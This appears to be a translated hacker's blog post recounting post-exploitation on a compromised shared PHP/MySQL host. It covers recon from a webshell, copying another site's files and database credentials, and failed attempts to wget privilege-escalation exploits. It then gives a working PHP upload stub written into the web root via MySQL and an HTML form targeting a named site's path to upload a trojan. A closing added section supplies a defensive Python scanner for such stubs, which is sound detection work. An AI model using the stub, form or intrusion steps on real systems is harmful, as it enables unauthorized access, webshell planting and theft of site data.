Author: hackdn
 
 
Today, the client received a shell on an Apache/2.2.3 (CentOS) host, which is a Linux system. The environment is PHP 5.2.17 with MySQL, without ASP or .NET.
 
First I used the built-in commands ls and uname. There was no output, so something must have been set in php.ini. The root directory has no write permission. chmod 777 will probably not be available even with a reverse shell.
 
First, try to create a file in tmp, run it from the shell directory, and start the local nc listener. whoami returns the WWWROOT permission.
 
View version
 
 
 
You can cd to the root directory (/var/www/virtual/) and then ls it. All the websites are listed, and the target site's folder name is easy to recognize, but there is no permission to enter it.
 
Packaging everything with tar fails: no permission. Packaging the target site's directory files separately works, but CONN.CONFIG in the root directory is readable only by the target site itself.
 
Trying cp on the target site's directory: the directory can be copied, but the files cannot. The database configuration information can be found and then used from another server.
 
Back up the database with phpspyshell:
 
 
Some configuration information and accounts can be seen, but there is no admin (back-end) path or other sensitive information.
 
The scanning tool cannot find the target website's folders. They have probably been modified.
 
I tried to escalate the privileges of mongoshell to USER or ROOT. I didn't look directly at the Apache configuration settings. I tried to wget a few exploits, but they were useless. It had probably been patched.
 
cp works, but the specific information is still unknown.
 
Since the web user has no permissions, try MySQL to see whether it has them.
 
Directly:

CREATE TABLE hackdn (spider BLOB);   (creates the table hackdn)

Save the one-liner in it.

Back up the file to the target path as 1.php. It cannot be connected to.
 
Copying it with cp shows the content is broken up by escape characters.

So, without the ' quotes, insert:

<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>

After backing it up as a PHP file, save the following code locally as 1.html:
 
<form enctype="multipart/form-data" action="http://www.bkjia.com/mysql_bak/1.php" method="POST">
<input name="MyFile" type="file">
<input value="submit" type="submit">
</form>
 
 
Upload the trojan directly and click OK.
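
A defender-side check for the artifact this technique leaves behind, as an added example that is not part of the original post: a Python scan of a web root for PHP files that contain an upload stub like the one above, or SQL-dump text next to a PHP open tag. The patterns, finding names and the constructed sample files are assumptions for illustration.

```python
import os
import re
import tempfile

# PHP open tag immediately followed by copy()/move_uploaded_file() on $_FILES.
UPLOAD_STUB = re.compile(
    rb"<\?(?:php)?\s*(?:copy|move_uploaded_file)\s*\(\s*\$_FILES", re.I)
# SQL-dump text inside a .php file: a database export saved as executable PHP.
DUMP_MARKERS = (b"INSERT INTO", b"CREATE TABLE", b"DROP TABLE")
PHP_EXTS = (".php", ".phtml", ".php5")


def classify(data):
    """Return the findings for one file's bytes."""
    findings = []
    if UPLOAD_STUB.search(data):
        findings.append("upload-stub")
    if b"<?" in data and any(m in data.upper() for m in DUMP_MARKERS):
        findings.append("sql-dump-with-php-tag")
    return findings


def scan(root):
    """Walk root; return {relative_path: findings} for suspicious PHP files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(PHP_EXTS)):
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    found = classify(fh.read(2 << 20))  # read at most 2 MiB
            except OSError:
                continue  # unreadable file: skip, do not abort the scan
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


def demo():
    """Scan a constructed web root (sample files are made up for this example)."""
    stub = b"<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>"
    samples = {"index.php": b"<?php echo 'hello'; ?>",
               "1.php": b"CREATE TABLE t (c BLOB);\nINSERT INTO t VALUES ('" + stub + b"');"}
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(body)
        return scan(root)
```

Run scan() against the real document root on a schedule; any hit on a file the application did not ship is worth triage.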